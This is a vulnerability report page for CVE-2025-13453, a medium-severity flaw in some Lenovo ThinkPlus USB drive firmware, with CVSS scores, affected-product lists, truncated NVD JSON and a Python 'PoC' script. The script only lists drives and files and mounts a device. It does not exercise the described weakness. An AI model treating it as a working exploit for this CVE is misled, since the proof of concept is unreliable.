Security Vulnerability Report
中文
CVE-2025-13453 CVSS 4.6 MEDIUM

CVE-2025-13453

Published: 2026-01-14 23:15:55
Last Modified: 2026-02-25 22:16:19

Description

A potential vulnerability was reported in some ThinkPlus USB drives that could allow a user with physical access to read data stored on the drive.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
ThinkPlus USB驱动器(部分型号)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13453 PoC - ThinkPlus USB Drive Data Read # Physical access required # No authentication needed import os import platform def read_usb_drive(): """ PoC for CVE-2025-13453 This demonstrates that physical access to ThinkPlus USB drive allows unauthorized data reading without authentication. """ system = platform.system() if system == 'Windows': # List available drives on Windows import win32api drives = win32api.GetLogicalDrives() print(f"Available drives: {drives}") # Attempt to read from removable drives for i in range(26): if drives & (1 << i): drive_letter = chr(65 + i) + ':\\' try: # Check if removable drive import win32file drive_type = win32file.GetDriveType(drive_letter) if drive_type == 2: # Removable print(f"Reading from {drive_letter}...") # List files on the drive for root, dirs, files in os.walk(drive_letter): for file in files: print(f"Found file: {os.path.join(root, file)}") except: pass elif system == 'Linux': # List block devices on Linux print("Checking /dev/sd* devices...") os.system('lsblk') # Try to mount and read USB drive print("Attempting to read USB drive contents...") os.system('sudo mount /dev/sdX1 /mnt/usb 2>/dev/null') os.system('ls -la /mnt/usb') elif system == 'Darwin': # List volumes on macOS print("Checking mounted volumes...") os.system('diskutil list') print("Reading removable media...") os.system('ls -la /Volumes/*') if __name__ == '__main__': print("CVE-2025-13453 PoC") print("Physical access to ThinkPlus USB drive required") read_usb_drive()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13453", "sourceIdentifier": "[email protected]", "published": "2026-01-14T23:15:55.483", "lastModified": "2026-02-25T22:16:19.080", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A potential vulnerability was reported in some ThinkPlus USB drives that could allow a user with physical access to read data stored on the drive."}, {"lang": "es", "value": "Una posible vulnerabilidad fue reportada en algunas unidades USB ThinkPlus que podría permitir a un usuario con acceso físico leer datos almacenados en la unidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5A5460E2-3400-4446-8D8D-8ED4E145A878"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "59ECD18D-2717-4BCD-8A1F-694DBF0A14A9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F204BFBA-8BF6-453E-B3AC-27DD050F9F3D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "9F88C86B-5FBA-4077-B312-33C9F848E4A5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5BE554C0-C967-4D36-9775-9DF07292A3E5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "22880F19-CD7D-4B04-B254-301AF9160CF8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE44C3-1470-4A6B-9533-D5C649C6FE7F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "D221D223-8E21-4769-85AA-2DFFFA42552A"}]}]}], "references": [{" ... (truncated)